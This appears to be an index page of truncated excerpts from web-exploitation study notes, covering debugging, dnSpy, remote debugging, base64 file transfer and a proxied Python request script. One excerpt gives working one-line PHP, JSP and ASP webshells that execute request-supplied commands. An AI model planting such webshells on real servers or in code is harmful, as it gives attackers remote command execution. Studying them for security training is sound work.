Base64 Upload/Download In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. ...

PHP WEBSHELL <?php system($_REQUEST["cmd"]); ?> JSP WEBSHELL <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP WEBSHELL <% eval request("cmd") %>

String Example: $app->post('upload-avatar', function (Request $request, Response $response, array $args) use ($container) { Useful for Notepad++ Keeps only the string $app->post('upload-a...

Remote Debugging Remote debugging allows us to debug a process running on a different system as long as we have access to the source code and the debugger port on the remote system. Let’s try...

Installation OPTION #1 The easiest way to install Visual Studio Code for Debian/Ubuntu based distributions is to download and install the .deb package (64-bit), either through the graphical softwa...

Assemblies Modification We can arbitrarily modify assemblies, by using this technique to add debugging statements to a log file or alter an assembly’s attributes in order to better debug our targe...

Debugging One of the best ways to understand an application is to run it through a debugger, which allows us to inspect application memory and call stacks. This information can be invaluable when ...

As is always the case when we have access to the source code, we first like to just look around and get a feel for the application. How is it organized? Can we identify any coding style that can he...

HTTP Request The following script will issue an HTTP request: import requests from colorama import Fore, Back, Style proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} req...

DnSpy We use dnSpy and attempt to decompile an executable’s code. We’ll drag the test.exe file to the dnSpy window, which automatically triggers the decompilation process in dnSpy. To view the ...